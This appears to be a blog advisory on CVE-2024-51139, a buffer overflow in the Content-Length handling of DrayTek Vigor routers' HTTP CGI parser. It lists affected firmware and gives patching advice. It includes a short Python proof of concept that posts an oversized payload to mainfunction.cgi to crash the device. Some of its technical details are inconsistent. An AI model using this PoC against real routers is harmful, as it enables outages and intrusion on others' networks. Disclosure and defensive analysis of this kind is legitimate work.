A serious security vulnerability has been publicly disclosed as CVE-2024-51139 affecting a wide range of DrayTek Vigor routers. This flaw is a buffer overflow found in the routers’ HTTP server CGI parser, specifically when handling the Content-Length header of HTTP POST requests. In simple terms, an attacker can use a carefully crafted web request to overwrite memory, which could let them run their own code on the device—remotely and without authentication.
Below is an exclusive, easy-to-understand breakdown of the vulnerability, its impact, technical details, and how it can be exploited.
Affected Devices and Firmware Versions
A lot of popular DrayTek routers are vulnerable. Here are the confirmed affected devices and their firmware versions:
- Vigor262/LTE200: 3.9.8.9 and earlier
- Vigor286/2925: 3.9.8 and earlier
- Vigor2862/2926: 3.9.9.5 and earlier
- Vigor2133/2762/2832: 3.9.9 and earlier
- Vigor165/166: 4.2.7 and earlier
- Vigor2135/2765/2766: 4.4.5.1 and earlier
- Vigor2865/2866/2927: 4.4.5.3 and earlier
- Vigor2962/391: 4.3.2.8/4.4.3.1 and earlier
Vigor3912: 4.3.6.1 and earlier
If your router’s firmware is older than these listed versions, it’s at risk. New firmware fixes are highly advised!
About the Vulnerability
The core of the issue is how the router’s web server parses POST requests sent to its CGI scripts. The server trusts the Content-Length header value and allocates memory for it unsafely. When an attacker sends a POST request with an overly large or negative Content-Length, the server’s buffer can overflow, leading to arbitrary code execution.
Below is a Python proof-of-concept (PoC) showing how an attacker might exploit this
import requests
# Replace with your target's IP address
target_url = "http://192.168.1.1/cgi-bin/mainfunction.cgi";
# The payload can be custom shellcode in a real attack
# Here we use "A" to show the overflow; real exploit would be specific
payload = "A" * 4096 # Adjust length as needed (real payload would be more complex)
headers = {
"Content-Type": "application/x-www-form-urlencoded",
"Content-Length": str(len(payload)), # Overflows buffer on vulnerable firmware
}
response = requests.post(target_url, headers=headers, data=payload)
print(f"Status Code: {response.status_code}")
Note: The actual exploit would require knowledge of the target’s memory layout, which means attackers can potentially run their own commands or drop a remote shell if they craft the payload carefully. This basic PoC can cause a crash if the router is vulnerable.
Why is This So Bad?
- Remote attack: Anyone on the Internet or local network can attack, if the HTTP interface is exposed.
- Privilege: The router process often runs as root/admin.
- Persistence: A successful attacker can persist on your device, spy or even pivot to other devices on your network.
References & Further Reading
- Official DrayTek Security Advisory
- NVD Entry for CVE-2024-51139
- Firmware Download & Upgrades
- Technical Writeup at SSD Secure Disclosure
- Practical Buffer Overflows (HackTricks Guide)
Conclusion
CVE-2024-51139 is a serious vulnerability impacting many popular DrayTek router models. Owing to how easy it is to attack (and the total control it gives), updating firmware is essential.
If you’re a network admin or responsible for an affected DrayTek device, patch NOW. Disable management interfaces from the Internet and review router settings for unnecessary exposure. For more details, consult the references above.
Timeline
Published on: 02/27/2025 21:15:37 UTC
Last modified on: 02/28/2025 18:15:28 UTC